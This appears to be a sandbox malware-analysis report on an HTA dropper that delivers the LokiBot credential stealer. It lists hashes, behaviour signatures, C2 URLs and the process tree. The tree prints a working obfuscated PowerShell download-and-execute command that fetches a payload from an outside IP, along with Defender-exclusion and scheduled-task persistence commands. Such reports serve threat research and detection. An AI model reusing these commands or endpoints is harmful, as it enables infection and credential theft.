Analysis
-
max time kernel
137s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
18-11-2024 17:41
General
-
Target
givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta
-
Size
178KB
-
MD5
e80a6dc30c45134e8c433ef07277022f
-
SHA1
9041ab7b0cf03e4c18f86ff32eac95c3ad06f462
-
SHA256
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182
-
SHA512
6156f6fcb24fedaabb7d1d62a0ff71e7bd8c6ab194c1a5c1b7ccc25644ba36dd62a79a8989dba98015044502a64db5c32187b802cc42dc964f25323c352519d8
-
SSDEEP
96:4vCl17nlkfktbLVe4I9qWs5cew1WyNk6O5Q:4vCldn+s9he4CqWj26O5Q
Malware Config
Extracted
lokibot
http://94.156.177.95/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 33 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe"C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'JFo3VE02ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRFZmluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJwdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGaUVJdnlPaGJJcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPZ2NBUnYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo3VE02OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjEzNi8zNy9jYXNwb2wuZXhlIiwiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUiLDAsMCk7c1RBUlQtc0xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjYXNwb2wuZXhlIg=='+[CHAr]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xth52laq\xth52laq.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC66D.tmp" "c:\Users\Admin\AppData\Local\Temp\xth52laq\CSC63C1D40E64504A10B5D821BB373F501D.TMP"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp756A.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
344B
MD5de9c9636e5149ab78e79b684f926bd18
SHA1c2a9ec28eb1bb95cbb59908f5b5af21a1e6667d7
SHA2560ed90f5a3554ac83bb776696e38413c88b5da74489d583f0b87820f3c97e9781
SHA512a7de45a62d6f4744d44fe869db0f4c10b1d880b9ec3d75ec6f6eb2d1199878f78b8638e2ce92f35c5ca9d82a66396a0e5d2b06f83afddf13089b061ff0771174
-
Filesize
17KB
MD5e045109d9c3e2d7e9a4764ba7a3271d8
SHA164b73e619a0d32faf57fdec82f7ef6a3ec1fb15a
SHA2568643f0e89929d9942ff32630ecaf7dd1e2463e3e84812339fb98590d2f44cb4a
SHA512294f76e4ee3ead1f490ff10da6205351a63e3716c495417c85aa9ab1a6056190a8ede57211f350d5167bb8202ace6a23d6280748256f968c6c276e6529ae3d98
-
Filesize
1KB
MD59fca0f1355d643f32799547585883d09
SHA14d21acf2d72dcca12855b8c9d8824739c2107d7f
SHA256f3eaf61d8773cac8e0e3ac8ad9712e2947f1a1335eb6f5822fcec343c401386d
SHA512e047312325e4c39e210fda63dbce24622071af15984aa5f8e5a931951181db0277310a1b434e7276c2abdd4d7f00d6661de210474c23a82030614bce0bd7a67d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD594ab2a6063a659d594f083e5cd100baa
SHA1cea556bd8dde1f1b95afb31d556fe447428c431d
SHA256b98b47e9c9a064c4876ca262f645f317e60eb1e5fb68e1ff0e65ac3d98b9fcea
SHA5129e88df7dbe488b82f5d2d31d96052258ab7529a84df3d096c729b9519a96309945bf4bde6ce4948b2aaa55e4ae701bc9e034d826bd3b88dd1c28adccd088a1c0
-
Filesize
3KB
MD5f2222918de55ff725e59f71dc97b06fe
SHA112dd3c4946c5c2371f909e695de8a997c8e84bb0
SHA2568b2cdd2c713aa6cd20243ce4a6025824456093d78f1c461a1e4e2c007ed8248e
SHA512e93ed10f4025d2dcf4ea67f1e83771889d8b636e8963451bd57751da4d7765dd4cadf20910fc182764ee91306535ff12b65845a3a3a66729458302d7f0839e83
-
Filesize
46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
Filesize
46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
568KB
MD5318ff90d7a2797a041b836f7f8900f62
SHA1fdda6afed7a1643ae353e7a635e6744c2b0a07d5
SHA256241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430
SHA512808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac
-
Filesize
652B
MD5c4ed556b65079a3930f70556acbecde1
SHA1d8ce6a2130e55719540f4c7fff34e436f37a6736
SHA25664af22b653860191344e1143193ac94c60377535f1f2fc0fe050d5019e316406
SHA512224da9e5c05d2670d01e30733347185028919dd9cb8d77730b0205b25c8570294b04a40d6a521d7d878717fda408cb6adc8d91dfe02907a3bbe0e9e5ddf5161c
-
Filesize
464B
MD5f8419bbc398e1a2b134eec88b333f8f6
SHA157ebba4cad00272da80b919df0908ec40f9be48a
SHA25625fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3
SHA512b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674
-
Filesize
369B
MD5ac479e66af8d2b3726d5304e128e2ca1
SHA1f68d985cdbe5208ee1897cd729c74649af16085c
SHA2562d4beb7fa3936cda1d97c2ec13b265bfcba027ad35b13b60340597526fe2fa6a
SHA512a2e4fcde4e12c54c18d1b9b1b247233a51e4babad733064972c3d56f5226469d7411345ec8b13c25e4420d72577d4b706bfd43081cdb89890ab27f4bfe42e978
-
Filesize
72KB
-
Filesize
680KB
-
Filesize
584KB
-
Filesize
592KB
-
Filesize
40KB
-
Filesize
5.6MB
-
Filesize
624KB
-
Filesize
400KB
-
Filesize
304KB
-
Filesize
648KB
-
Filesize
648KB
-
Filesize
68KB
-
Filesize
304KB
-
Filesize
200KB
-
Filesize
120KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
80KB
-
Filesize
56KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
652KB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
408KB
-
Filesize
32KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
216KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
304KB
-
Filesize
304KB
-
Filesize
68KB
-
Filesize
80KB
-
Filesize
652KB
-
Filesize
304KB
-
Filesize
3.3MB